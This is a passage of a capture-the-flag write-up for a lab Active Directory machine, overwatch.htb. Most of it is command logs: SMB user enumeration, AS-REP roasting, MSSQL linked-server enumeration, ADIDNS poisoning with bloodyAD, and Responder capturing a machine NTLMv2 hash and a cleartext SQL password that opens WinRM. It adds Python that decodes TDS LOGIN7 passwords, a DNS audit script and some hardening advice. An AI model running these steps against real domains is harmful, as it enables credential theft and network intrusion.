SMB 10.129.6.144 445 S200401 [*] Windows Server 2022 Build 20348 x64 (name:S200401) (domain:overwatch.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.6.144 445 S200401 [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv
SMB 10.129.6.144 445 S200401 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.6.144 445 S200401 Administrator 2025-05-17 03:09:35 0 Built-in account for administering the computer/domain
SMB 10.129.6.144 445 S200401 Guest 2025-05-17 04:34:27 0 Built-in account for guest access to the computer/domain
SMB 10.129.6.144 445 S200401 krbtgt 2025-05-17 00:08:45 0 Key Distribution Center Service Account
SMB 10.129.6.144 445 S200401 sqlsvc 2025-05-17 00:47:43 0
SMB 10.129.6.144 445 S200401 sqlmgmt 2025-05-17 01:24:21 0
SMB 10.129.6.144 445 S200401 Charlie.Moss 2025-05-17 03:05:41 0
SMB 10.129.6.144 445 S200401 Tracy.Burns 2025-05-17 03:05:41 0
SMB 10.129.6.144 445 S200401 Kathryn.Bryan 2025-05-17 03:05:41 0
SMB 10.129.6.144 445 S200401 Rachael.Thomas 2025-05-17 03:05:41 0
SMB 10.129.6.144 445 S200401 Aimee.Smith 2025-05-17 03:05:41 0
SMB 10.129.6.144 445 S200401 Duncan.Freeman 2025-05-17 03:05:41 0
SMB 10.129.6.144 445 S200401 John.Begum 2025-05-17 03:05:42 0
SMB 10.129.6.144 445 S200401 Bernard.Hilton 2025-05-17 03:05:42 0
SMB 10.129.6.144 445 S200401 Kim.Hargreaves 2025-05-17 03:05:42 0
SMB 10.129.6.144 445 S200401 Douglas.Burrows 2025-05-17 03:05:42 0
SMB 10.129.6.144 445 S200401 Carole.Murray 2025-05-17 03:05:42 0
SMB 10.129.6.144 445 S200401 Olivia.Quinn 2025-05-17 03:05:42 0
SMB 10.129.6.144 445 S200401 Trevor.Baker 2025-05-17 03:05:42 0
SMB 10.129.6.144 445 S200401 Kenneth.Dennis 2025-05-17 03:05:42 0
SMB 10.129.6.144 445 S200401 Jeremy.Marshall 2025-05-17 03:05:43 0
SMB 10.129.6.144 445 S200401 Jodie.Jones 2025-05-17 03:05:43 0
SMB 10.129.6.144 445 S200401 Thomas.Lee 2025-05-17 03:05:43 0
SMB 10.129.6.144 445 S200401 Terence.Matthews 2025-05-17 03:05:43 0
SMB 10.129.6.144 445 S200401 Colin.Roberts 2025-05-17 03:05:43 0
SMB 10.129.6.144 445 S200401 Aaron.Robinson 2025-05-17 03:05:43 0
SMB 10.129.6.144 445 S200401 Amanda.Jenkins 2025-05-17 03:05:44 0
SMB 10.129.6.144 445 S200401 Debra.Arnold 2025-05-17 03:05:44 0
SMB 10.129.6.144 445 S200401 Michelle.Willis 2025-05-17 03:05:44 0
SMB 10.129.6.144 445 S200401 Kayleigh.Jones 2025-05-17 03:05:44 0
SMB 10.129.6.144 445 S200401 Adam.Russell 2025-05-17 03:05:44 0
SMB 10.129.6.144 445 S200401 Tracey.Kelly 2025-05-17 03:05:44 0
SMB 10.129.6.144 445 S200401 Bethan.Dale 2025-05-17 03:05:44 0
SMB 10.129.6.144 445 S200401 Mandy.Wood 2025-05-17 03:05:44 0
SMB 10.129.6.144 445 S200401 Jenna.Phillips 2025-05-17 03:05:45 0
SMB 10.129.6.144 445 S200401 Carole.Yates 2025-05-17 03:05:45 0
SMB 10.129.6.144 445 S200401 Graham.Perry 2025-05-17 03:05:45 0
SMB 10.129.6.144 445 S200401 Catherine.Griffiths 2025-05-17 03:05:45 0
SMB 10.129.6.144 445 S200401 Shaun.Jackson 2025-05-17 03:05:45 0
SMB 10.129.6.144 445 S200401 Bethan.Rogers 2025-05-17 03:05:45 0
SMB 10.129.6.144 445 S200401 Ellie.Singh 2025-05-17 03:05:45 0
SMB 10.129.6.144 445 S200401 Marie.Allan 2025-05-17 03:05:46 0
SMB 10.129.6.144 445 S200401 Patrick.Holmes 2025-05-17 03:05:46 0
SMB 10.129.6.144 445 S200401 Victor.Hopkins 2025-05-17 03:05:46 0
SMB 10.129.6.144 445 S200401 Geraldine.Harper 2025-05-17 03:05:46 0
SMB 10.129.6.144 445 S200401 George.Todd 2025-05-17 03:05:46 0
SMB 10.129.6.144 445 S200401 Karl.Smith 2025-05-17 03:05:46 0
SMB 10.129.6.144 445 S200401 Jacqueline.Norton 2025-05-17 03:05:46 0
SMB 10.129.6.144 445 S200401 Frederick.Murray 2025-05-17 03:05:46 0
SMB 10.129.6.144 445 S200401 Joe.Pearce 2025-05-17 03:05:47 0
SMB 10.129.6.144 445 S200401 Paul.Collins 2025-05-17 03:05:47 0
SMB 10.129.6.144 445 S200401 Damien.Edwards 2025-05-17 03:05:47 0
SMB 10.129.6.144 445 S200401 Eileen.Phillips 2025-05-17 03:05:47 0
SMB 10.129.6.144 445 S200401 Carl.Johnson 2025-05-17 03:05:47 0
SMB 10.129.6.144 445 S200401 Kevin.Newton 2025-05-17 03:05:47 0
SMB 10.129.6.144 445 S200401 Natalie.Higgins 2025-05-17 03:05:47 0
SMB 10.129.6.144 445 S200401 Francis.Weston 2025-05-17 03:05:48 0
SMB 10.129.6.144 445 S200401 Benjamin.Davison 2025-05-17 03:05:48 0
SMB 10.129.6.144 445 S200401 Martin.Kemp 2025-05-17 03:05:48 0
SMB 10.129.6.144 445 S200401 Angela.Jones 2025-05-17 03:05:48 0
SMB 10.129.6.144 445 S200401 Gareth.Ahmed 2025-05-17 03:05:48 0
SMB 10.129.6.144 445 S200401 Deborah.Morgan 2025-05-17 03:05:48 0
SMB 10.129.6.144 445 S200401 Grace.Taylor 2025-05-17 03:05:48 0
SMB 10.129.6.144 445 S200401 Roger.Hughes 2025-05-17 03:05:48 0
SMB 10.129.6.144 445 S200401 Albert.Barrett 2025-05-17 03:05:49 0
SMB 10.129.6.144 445 S200401 Grace.Curtis 2025-05-17 03:05:49 0
SMB 10.129.6.144 445 S200401 Marilyn.Griffiths 2025-05-17 03:05:49 0
SMB 10.129.6.144 445 S200401 Tracey.Barker 2025-05-17 03:05:49 0
SMB 10.129.6.144 445 S200401 Suzanne.Hughes 2025-05-17 03:05:49 0
SMB 10.129.6.144 445 S200401 Timothy.Jackson 2025-05-17 03:05:49 0
SMB 10.129.6.144 445 S200401 Beverley.Thompson 2025-05-17 03:05:49 0
SMB 10.129.6.144 445 S200401 Clare.Bartlett 2025-05-17 03:05:50 0
SMB 10.129.6.144 445 S200401 Irene.Johnson 2025-05-17 03:05:50 0
SMB 10.129.6.144 445 S200401 Bernard.Wood 2025-05-17 03:05:50 0
SMB 10.129.6.144 445 S200401 Frank.McCarthy 2025-05-17 03:05:50 0
SMB 10.129.6.144 445 S200401 Elaine.Page 2025-05-17 03:05:50 0
SMB 10.129.6.144 445 S200401 Elaine.Walker 2025-05-17 03:05:50 0
SMB 10.129.6.144 445 S200401 Mohammad.Hill 2025-05-17 03:05:50 0
SMB 10.129.6.144 445 S200401 Glenn.Field 2025-05-17 03:05:50 0
SMB 10.129.6.144 445 S200401 Deborah.Martin 2025-05-17 03:05:51 0
SMB 10.129.6.144 445 S200401 Gail.Sullivan 2025-05-17 03:05:51 0
SMB 10.129.6.144 445 S200401 Maureen.Kirby 2025-05-17 03:05:51 0
SMB 10.129.6.144 445 S200401 Georgina.Chambers 2025-05-17 03:05:51 0
SMB 10.129.6.144 445 S200401 Philip.Harris 2025-05-17 03:05:51 0
SMB 10.129.6.144 445 S200401 Samantha.Scott 2025-05-17 03:05:51 0
SMB 10.129.6.144 445 S200401 Ann.Hill 2025-05-17 03:05:51 0
SMB 10.129.6.144 445 S200401 Chloe.Cox 2025-05-17 03:05:51 0
SMB 10.129.6.144 445 S200401 Jamie.Gough 2025-05-17 03:05:52 0
SMB 10.129.6.144 445 S200401 Frederick.Hussain 2025-05-17 03:05:52 0
SMB 10.129.6.144 445 S200401 Dean.Hobbs 2025-05-17 03:05:52 0
SMB 10.129.6.144 445 S200401 Danielle.Moore 2025-05-17 03:05:52 0
SMB 10.129.6.144 445 S200401 Timothy.Smith 2025-05-17 03:05:52 0
SMB 10.129.6.144 445 S200401 Declan.Stone 2025-05-17 03:05:52 0
SMB 10.129.6.144 445 S200401 Jacob.Wilson 2025-05-17 03:05:52 0
SMB 10.129.6.144 445 S200401 Gary.Elliott 2025-05-17 03:05:52 0
SMB 10.129.6.144 445 S200401 Peter.Slater 2025-05-17 03:05:53 0
SMB 10.129.6.144 445 S200401 Louise.Walton 2025-05-17 03:05:53 0
SMB 10.129.6.144 445 S200401 Brett.Haynes 2025-05-17 03:05:53 0
SMB 10.129.6.144 445 S200401 Elliot.Green 2025-05-17 03:05:53 0
SMB 10.129.6.144 445 S200401 Wendy.Williams 2025-05-17 03:05:53 0
SMB 10.129.6.144 445 S200401 Graham.Parker 2025-05-17 03:05:53 0
SMB 10.129.6.144 445 S200401 Abdul.Stevens 2025-05-17 03:05:53 0
SMB 10.129.6.144 445 S200401 Brett.Bailey 2025-05-17 03:05:54 0
SMB 10.129.6.144 445 S200401 Benjamin.Harrison 2025-05-17 03:05:54 0
SMB 10.129.6.144 445 S200401 Emily.Cooper 2025-05-17 03:05:54 0
SMB 10.129.6.144 445 S200401 Roger.Spencer 2025-05-17 03:05:54 0
SMB 10.129.6.144 445 S200401 [*] Enumerated 105 local users: OVERWATCH
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm 10.129.6.144 -u "sqlsvc" -p "TI0LKcfHzZw1Vv"
WINRM 10.129.6.144 5985 S200401 [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.6.144 5985 S200401 [-] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv

This credential pair cannot be used to log in to the target with evil-winrm directly, so the next step is to work from the enumerated user list.

AS-REP Roasting attack

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-GetNPUsers -usersfile users.txt -no-pass -dc-ip 10.129.6.144 overwatch.htb/
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sqlsvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sqlmgmt doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Charlie.Moss doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Tracy.Burns doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kathryn.Bryan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Rachael.Thomas doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Aimee.Smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Duncan.Freeman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User John.Begum doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Bernard.Hilton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kim.Hargreaves doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Douglas.Burrows doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Carole.Murray doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Olivia.Quinn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Trevor.Baker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kenneth.Dennis doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jeremy.Marshall doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jodie.Jones doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Thomas.Lee doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Terence.Matthews doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Colin.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Aaron.Robinson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Amanda.Jenkins doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Debra.Arnold doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Michelle.Willis doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kayleigh.Jones doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Adam.Russell doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Tracey.Kelly doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Bethan.Dale doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Mandy.Wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jenna.Phillips doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Carole.Yates doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Graham.Perry doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Catherine.Griffiths doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Shaun.Jackson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Bethan.Rogers doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Ellie.Singh doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Marie.Allan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Patrick.Holmes doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Victor.Hopkins doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Geraldine.Harper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User George.Todd doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Karl.Smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jacqueline.Norton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Frederick.Murray doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Joe.Pearce doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Paul.Collins doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Damien.Edwards doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Eileen.Phillips doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Carl.Johnson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kevin.Newton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Natalie.Higgins doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Francis.Weston doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Benjamin.Davison doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Martin.Kemp doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Angela.Jones doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Gareth.Ahmed doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Deborah.Morgan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Grace.Taylor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Roger.Hughes doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Albert.Barrett doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Grace.Curtis doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Marilyn.Griffiths doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Tracey.Barker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Suzanne.Hughes doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Timothy.Jackson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Beverley.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Clare.Bartlett doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Irene.Johnson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Bernard.Wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Frank.McCarthy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Elaine.Page doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Elaine.Walker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Mohammad.Hill doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Glenn.Field doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Deborah.Martin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Gail.Sullivan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Maureen.Kirby doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Georgina.Chambers doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Philip.Harris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Samantha.Scott doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Ann.Hill doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Chloe.Cox doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jamie.Gough doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Frederick.Hussain doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Dean.Hobbs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Danielle.Moore doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Timothy.Smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Declan.Stone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jacob.Wilson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Gary.Elliott doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Peter.Slater doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Louise.Walton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Brett.Haynes doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Elliot.Green doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Wendy.Williams doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Graham.Parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Abdul.Stevens doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Brett.Bailey doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Benjamin.Harrison doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Emily.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Roger.Spencer doesn't have UF_DONT_REQUIRE_PREAUTH set

The attack yields nothing. Stepping back, the obvious move is to use the database credentials against the database itself.

The earlier port scan showed an MSSQL service listening on port 6520.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-mssqlclient overwatch.htb/sqlsvc:"TI0LKcfHzZw1Vv"@10.129.6.144 -port 6520 -windows-auth
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(S200401\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(S200401\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (OVERWATCH\sqlsvc guest@master)>

Trying to enable xp_cmdshell fails: the login is only a guest in master and cannot run RECONFIGURE.

SQL (OVERWATCH\sqlsvc  guest@master)> enable_xp_cmdshell
ERROR(S200401\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(S200401\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(S200401\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(S200401\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (OVERWATCH\sqlsvc guest@master)>

Enumerate the linked servers (enum_links)

SQL (OVERWATCH\sqlsvc  guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
------------------ ---------------- ----------- ------------------ ------------------ ------------ -------
S200401\SQLEXPRESS SQLNCLI SQL Server S200401\SQLEXPRESS NULL NULL NULL
SQL07 SQLNCLI SQL Server SQL07 NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
------------- ----------- --------------- ------------

This reveals another host, SQL07. Querying through the link fails with a login timeout: the name does not currently resolve to a reachable SQL Server.

SQL (OVERWATCH\sqlsvc  guest@master)> SELECT * FROM OPENQUERY("SQL07", 'select SYSTEM_USER');
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "Login timeout expired".
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online.".
ERROR(MSOLEDBSQL): Line 0: Named Pipes Provider: Could not open a connection to SQL Server [64].
SQL (OVERWATCH\sqlsvc guest@master)>

I was stuck here for a long time; only after reading other people's writeups did I realize Responder could be used for a relay attack (so all that GOAD practice went in one ear and out the other).

ADIDNS poisoning: in a Windows domain, by default any authenticated user may create records in Active Directory-integrated DNS. You use the bloodyAD tool to point SQL07 at your attack machine's IP (10.10.15.114).

Authentication coercion: when you run use_link [SQL07] followed by xp_dirtree on the primary server (S200401), the primary server follows the DNS answer and tries to connect to your Kali box.

Credential leak (compared with the original writeup): Responder normally captures an NTLMv2 hash, but in your run, because the SQL07 linked-server configuration may use "be made using this security context" or a hard-coded login mapping, Responder captured the cleartext password sqlmgmt:bIhBbzMMnB82yx. That is more efficient than cracking a hash and directly yields WinRM access as sqlmgmt.
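Why the capture is cleartext rather than a hash: the linked server logs in to "SQL07" with a stored SQL login, and the MS-TDS LOGIN7 message only obfuscates that password (per byte, swap the two nibbles and XOR with 0xA5) unless the TDS session is wrapped in TLS. The Python below is an added example written for this writeup, not code from the original post or from Responder. It builds a minimal LOGIN7 message for the credential pair captured above and recovers it again, which is exactly what a rogue SQL endpoint reached through a poisoned DNS name can do. The hostname, application name and TDS version are constructed values.

```python
"""Added example: MS-TDS LOGIN7 password obfuscation is reversible."""
from __future__ import annotations

import struct

FIXED_LEN = 94         # bytes in the LOGIN7 fixed header (MS-TDS 2.2.6.4)
TDS_7_4 = 0x74000004   # TDSVersion for TDS 7.4 (constructed choice for the demo)


def tds_obfuscate_password(password: str) -> bytes:
    """Encode a password as a TDS client places it into LOGIN7.

    Per byte of the UTF-16LE password: swap the high and low nibbles, then
    XOR with 0xA5. This is obfuscation, not encryption.
    """
    out = bytearray()
    for b in password.encode("utf-16-le"):
        swapped = ((b & 0x0F) << 4) | (b >> 4)
        out.append(swapped ^ 0xA5)
    return bytes(out)


def tds_recover_password(blob: bytes) -> str:
    """Reverse tds_obfuscate_password: XOR 0xA5, then swap the nibbles back."""
    out = bytearray()
    for b in blob:
        x = b ^ 0xA5
        out.append(((x & 0x0F) << 4) | (x >> 4))
    return out.decode("utf-16-le")


def build_login7(hostname: str, username: str, password: str,
                 appname: str = "OLEDB", servername: str = "SQL07") -> bytes:
    """Construct a minimal LOGIN7 message (the payload after the 8-byte TDS packet header).

    Only the five leading variable-length fields are populated; the remaining
    offset/length pairs stay zero, which is acceptable for a minimal login.
    """
    fields = [
        hostname.encode("utf-16-le"),
        username.encode("utf-16-le"),
        tds_obfuscate_password(password),
        appname.encode("utf-16-le"),
        servername.encode("utf-16-le"),
    ]
    data = b"".join(fields)
    hdr = bytearray(FIXED_LEN)
    struct.pack_into("<I", hdr, 0, FIXED_LEN + len(data))  # Length
    struct.pack_into("<I", hdr, 4, TDS_7_4)                # TDSVersion
    struct.pack_into("<I", hdr, 8, 4096)                   # PacketSize
    offset = FIXED_LEN
    for i, field in enumerate(fields):
        # OffsetLength block starts at byte 36 as (ibX, cchX) pairs, 4 bytes each:
        # HostName, UserName, Password, AppName, ServerName in that order.
        struct.pack_into("<HH", hdr, 36 + 4 * i, offset, len(field) // 2)
        offset += len(field)
    return bytes(hdr) + data


def extract_sql_login(login7: bytes) -> tuple[str, str]:
    """What a rogue TDS listener does: read the UserName/Password offsets and decode."""
    ib_user, cch_user, ib_pw, cch_pw = struct.unpack_from("<HHHH", login7, 40)
    username = login7[ib_user:ib_user + 2 * cch_user].decode("utf-16-le")
    password = tds_recover_password(login7[ib_pw:ib_pw + 2 * cch_pw])
    return username, password


if __name__ == "__main__":
    # Credential pair from the Responder capture above; "S200401" is the client host.
    pkt = build_login7("S200401", "sqlmgmt", "bIhBbzMMnB82yx")
    print(extract_sql_login(pkt))  # ('sqlmgmt', 'bIhBbzMMnB82yx')
```

The defensive takeaway is that the password is protected only by the transport. Forcing encryption on the instance (or setting Encrypt=yes in the linked server's provider string) keeps LOGIN7 inside TLS, and binding linked servers to a Windows security context instead of a stored SQL login leaves no reusable password to hand over; the ADIDNS change that redirected "SQL07" is what turned a routine linked-server login into a disclosure.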

First, use the database credentials we obtained to add a malicious DNS record to the domain controller.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodyAD -d overwatch.htb -u sqlsvc -p "TI0LKcfHzZw1Vv" --dc-ip 10.129.6.144 add dnsRecord sql07 "10.10.15.114"
[+] sql07 has been successfully added
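What makes the record above possible is the default ACE on AD-integrated zones that lets Authenticated Users create child dnsNode objects, so a defender's compensating check is to diff the zone against expected addresses and owners. The Python below is an added example, not from the original writeup or from bloodyAD; the records, trusted networks and allowed owners are constructed, with the sql07 entry mirroring the record just added.

```python
"""Added example: flag ADIDNS A records that point outside trusted space or were created by unexpected principals."""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class DnsARecord:
    name: str     # dnsNode name within the zone, e.g. "sql07"
    address: str  # A record data
    owner: str    # owner taken from the dnsNode object's security descriptor


def find_rogue_a_records(records, trusted_networks, allowed_owners):
    """Return [(record, [reasons])] for records a defender should review.

    Two independent signals: the address is not inside any trusted network, or
    the dnsNode was created by a principal that is not an expected DNS owner
    (a record created by an ordinary user or service account is the ADIDNS
    abuse pattern).
    """
    nets = [ipaddress.ip_network(n, strict=False) for n in trusted_networks]
    owners = {o.lower() for o in allowed_owners}
    findings = []
    for rec in records:
        reasons = []
        ip = ipaddress.ip_address(rec.address)
        if not any(ip in n for n in nets):
            reasons.append(f"{rec.address} is outside trusted networks")
        if rec.owner.lower() not in owners:
            reasons.append(f"created by unexpected principal {rec.owner}")
        if reasons:
            findings.append((rec, reasons))
    return findings


# Constructed zone snapshot for overwatch.htb (not real dump output).
SAMPLE_RECORDS = [
    DnsARecord("s200401", "10.129.6.144", "NT AUTHORITY\\SYSTEM"),
    DnsARecord("dc-alias", "10.129.6.144", "OVERWATCH\\DnsAdmins"),
    DnsARecord("sql07", "10.10.15.114", "OVERWATCH\\sqlsvc"),  # mirrors the record added above
]
TRUSTED_NETWORKS = ["10.129.0.0/16"]
ALLOWED_OWNERS = ["NT AUTHORITY\\SYSTEM", "OVERWATCH\\DnsAdmins", "OVERWATCH\\Domain Admins"]


def audit_sample():
    """Run the check over the constructed snapshot; returns the names of flagged records."""
    return [rec.name for rec, _ in find_rogue_a_records(SAMPLE_RECORDS, TRUSTED_NETWORKS, ALLOWED_OWNERS)]


if __name__ == "__main__":
    for rec, reasons in find_rogue_a_records(SAMPLE_RECORDS, TRUSTED_NETWORKS, ALLOWED_OWNERS):
        print(rec.name, "->", "; ".join(reasons))
```

The inputs come from the dnsNode objects under CN=MicrosoftDNS in the DomainDnsZones partition, each of which carries an owner in its nTSecurityDescriptor. Alerting on directory change events for newly created dnsNode objects, or tightening the zone's "Create all child objects" permission so that only the DNS server and admins hold it, addresses the root cause rather than the symptom.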

Ping the name to confirm the record was added.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ping SQL07.overwatch.htb
PING SQL07.overwatch.htb (198.18.0.19) 56(84) bytes of data.
64 bytes from 198.18.0.19: icmp_seq=1 ttl=64 time=0.462 ms
64 bytes from 198.18.0.19: icmp_seq=2 ttl=64 time=0.640 ms
64 bytes from 198.18.0.19: icmp_seq=3 ttl=64 time=0.388 ms
64 bytes from 198.18.0.19: icmp_seq=4 ttl=64 time=0.216 ms
^C
--- SQL07.overwatch.htb ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3041ms
rtt min/avg/max/mdev = 0.216/0.426/0.640/0.152 ms

Then start Responder listening (remember to turn off all local firewalls so the inbound SMB and MSSQL connections reach it).

Run the use_link [SQL07] command inside the database session.

[SMB] NTLMv2-SSP Client   : 10.129.6.144
[SMB] NTLMv2-SSP Username : OVERWATCH\S200401$
[SMB] NTLMv2-SSP Hash : S200401$::OVERWATCH:a4c91d5ad446f2e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
[MSSQL] Cleartext Client : 10.129.6.144
[MSSQL] Cleartext Hostname : SQL07 ()
[MSSQL] Cleartext Username : sqlmgmt
[MSSQL] Cleartext Password : bIhBbzMMnB82yx

sqlmgmt:bIhBbzMMnB82yx

This credential pair has remote login (WinRM) rights.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm 10.129.6.144 -u "sqlmgmt" -p "bIhBbzMMnB82yx"
WINRM 10.129.6.144 5985 S200401 [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
